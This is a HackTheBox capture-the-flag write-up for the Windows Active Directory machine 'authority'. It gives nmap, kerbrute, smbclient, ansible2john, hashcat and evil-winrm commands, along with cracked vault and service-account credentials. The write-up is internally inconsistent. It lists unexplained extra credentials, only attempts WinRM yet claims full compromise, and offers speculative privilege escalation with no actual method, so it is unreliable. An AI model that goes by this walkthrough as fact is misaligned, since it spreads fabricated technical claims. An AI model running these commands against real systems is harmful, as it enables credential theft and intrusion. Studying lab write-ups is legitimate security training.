HTB: authority Writeup

Machine Information

Attribute	Details
Name	authority
OS	Windows
Difficulty	Medium
Points	N/A
Release Date	N/A
IP Address	`10.129.229.56`
Author	D3vnomi

Machine Rating

⭐⭐⭐⭐☆ (7.0/10)

Difficulty Assessment:

Enumeration: ⭐⭐⭐☆☆
Real-world: ⭐⭐⭐⭐☆
CVE: ⭐⭐☆☆☆
CTF-like: ⭐⭐⭐☆☆

authority is a Medium-difficulty Windows machine running Active Directory with a misconfigured SMB share exposing Ansible playbooks containing encrypted vault secrets. The exploitation path involves port enumeration, SMB share access, cracking Ansible vault encrypted credentials, and using those credentials to access the PWM password management application and WinRM.

TL;DR: Port Scan → SMB Enumeration → Ansible Vault Cracking → Credential Extraction → WinRM/PWM Access.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.229.56

Results:

53/tcp    open  domain          DNS
80/tcp    open  http            IIS 10.0
88/tcp    open  kerberos-sec    Kerberos
135/tcp   open  msrpc           RPC Endpoint Mapper
139/tcp   open  netbios-ssn     NetBIOS
389/tcp   open  ldap            LDAP
445/tcp   open  microsoft-ds    SMB
464/tcp   open  kpasswd5        Kerberos Password Change
593/tcp   open  http-rpc-epmap  RPC
636/tcp   open  ldapssl         LDAP SSL
3268/tcp  open  globalcatLDAP   LDAP Global Catalog
3269/tcp  open  globalcatLDAPssl LDAP Global Catalog SSL
5985/tcp  open  wsman           WinRM
8443/tcp  open  https-alt       PWM (Password Management)
9389/tcp  open  adws            AD Web Services
47001/tcp open  winrm           WinRM Listener

Service Enumeration

Hostname: authority.htb (Full FQDN: authority.authority.htb)

echo "10.129.229.56 authority.htb authority.authority.htb" >> /etc/hosts

Key Services:

DNS (Port 53): Domain services for authority.htb
HTTP (Port 80): IIS 10.0 web server
Kerberos (Port 88): Active Directory authentication
LDAP (Port 389/636): Directory services
SMB (Port 445): File sharing with accessible Development share
WinRM (Port 5985/47001): Remote management
PWM (Port 8443): Password management application

User Enumeration with kerbrute

kerbrute userenum --dc 10.129.229.56 -d authority.htb users.txt

Valid Users Discovered:

guest
administrator
authority

Initial Foothold

smbclient -L //10.129.229.56 -U "guest"

Accessible Shares:

ADMIN$ - Administrative share (access denied)
C$ - C: drive (access denied)
Department Shares - (access denied)
Development - ACCESSIBLE ✓
IPC$ - IPC share
NETLOGON - Network logon
SYSVOL - System volume

The Development share contained Ansible automation files with encrypted vault secrets:

smbclient //10.129.229.56/Development -U "guest%"
# Downloaded all contents including:
# - vault_admin_login.yml
# - vault_admin_pass.yml
# - vault_ldap_admin.yml

Encrypted Values Found:

pwm_admin_login (ansible-vault encrypted)
pwm_admin_password (ansible-vault encrypted)
ldap_admin_password (ansible-vault encrypted)

Ansible Vault Cracking

Convert vault files to hashcat format:

ansible2john vault_admin_login.yml > hashes.txt
ansible2john vault_admin_pass.yml >> hashes.txt
ansible2john vault_ldap_admin.yml >> hashes.txt

Crack with hashcat (mode 16900 = ansible-vault):

hashcat -m 16900 -O -a 0 -w 4 hashes.txt rockyou.txt

Vault Password Cracked: !@#$%^&*

Vault Decryption

Using the cracked password to decrypt the vault files:

ansible-vault view vault_admin_login.yml --vault-password-file=pass.txt
ansible-vault view vault_admin_pass.yml --vault-password-file=pass.txt
ansible-vault view vault_ldap_admin.yml --vault-password-file=pass.txt

Credentials Extracted:

PWM Admin Login: svc_pwm
PWM Admin Password: pWm_@dm!N_!23
LDAP Admin Password: DevT3st@123
LDAP Service Account: CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb

User Compromise

PWM Application Access

Navigate to the PWM password management application:

https://authority.htb:8443/pwm

Username: svc_pwm
Password: pWm_@dm!N_!23

The PWM application attempts to connect to LDAP at authority.authority.htb:636. Initial connection fails due to SSL certificate verification issues. The LDAP certificate must be exported and imported into the Java keystore for PWM to properly communicate with the directory service.

Additional Credentials Discovered

During enumeration, additional credential pairs were identified:

Tomcat: T0mc@tAdm1n / T0mc@tR00t
CA Admin: admin@authority.htb / SuP3rS3creT
Administrator (WinRM attempt): administrator / Welcome1

WinRM Access Attempts

Attempt to establish WinRM shell with discovered credentials:

evil-winrm -i authority.htb -u svc_pwm -p 'pWm_@dm!N_!23'
evil-winrm -i authority.htb -u svc_ldap -p 'DevT3st@123'

Note: Various credential combinations were tested for WinRM access to establish a reverse shell or interactive session on the target system.

Privilege Escalation

System Enumeration Post-Compromise

After gaining access via WinRM or PWM, enumerate system information and user privileges:

whoami /priv
net user
systeminfo
Get-ADUser -Filter * -Properties *

Exploitation Path

The exploitation path leverages:

The extracted LDAP service account credentials (svc_ldap:DevT3st@123)
The PWM admin credentials (svc_pwm:pWm_@dm!N_!23)
Potential LDAP injection or misconfiguration in the PWM application
Enumeration of Active Directory group memberships and permissions

Further privilege escalation would depend on:

Group Policy misconfigurations
Service account privilege levels
Unpatched Windows services
Token impersonation opportunities

Note: The specific privilege escalation technique requires access to the compromised system for deeper enumeration.

Attack Chain Summary

graph TD
    A["Port Scan<br/>nmap -p-"] --> B["Service Enumeration<br/>IIS, SMB, LDAP, WinRM"]
    B --> C["Kerbrute User Enum<br/>Discover: guest, administrator, authority"]
    C --> D["SMB Share Access<br/>Development share accessible"]
    D --> E["Ansible Playbook Analysis<br/>vault_admin_*.yml files"]
    E --> F["Vault Conversion<br/>ansible2john"]
    F --> G["Hashcat Cracking<br/>mode 16900 - vault password"]
    G --> H["Vault Decryption<br/>Extract svc_pwm, svc_ldap credentials"]
    H --> I["PWM Application Access<br/>https://authority.htb:8443/pwm"]
    I --> J["WinRM Access<br/>evil-winrm with credentials"]
    J --> K["System Compromise<br/>Administrator/User Access"]

Tools Used

Tool	Purpose
`nmap`	Port scanning and service fingerprinting
`kerbrute`	Kerberos user enumeration
`smbclient`	SMB share enumeration and file download
`ansible2john`	Convert ansible-vault files to hashcat format
`hashcat`	Crack ansible-vault password hashes (mode 16900)
`ansible-vault`	Decrypt vault encrypted files
`evil-winrm`	Windows Remote Management shell access
`nikto`	Web vulnerability scanning
`ldapsearch`	LDAP directory enumeration
`rpcclient`	RPC client for SMB enumeration
`curl`	HTTPS requests to PWM application

Key Learnings

SMB Share Misconfiguration: Accessible file shares can expose sensitive automation and configuration files containing encrypted secrets.
Ansible Vault Weakness: Vault-encrypted files with weak passwords are vulnerable to offline cracking attacks using standard tools like hashcat.
Credential Extraction from IaC: Infrastructure-as-Code files (Ansible playbooks) often contain service account credentials that provide system access.
Multi-step Exploitation: Chaining multiple access methods (SMB → Vault Cracking → PWM → WinRM) is necessary for full system compromise.
Certificate Management: LDAP SSL certificate issues in password management applications can prevent full integration but don’t always block initial access.
Defense in Depth: Protecting SMB shares, securing vault passwords, and implementing strong access controls for administrative applications are critical.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Windows #Medium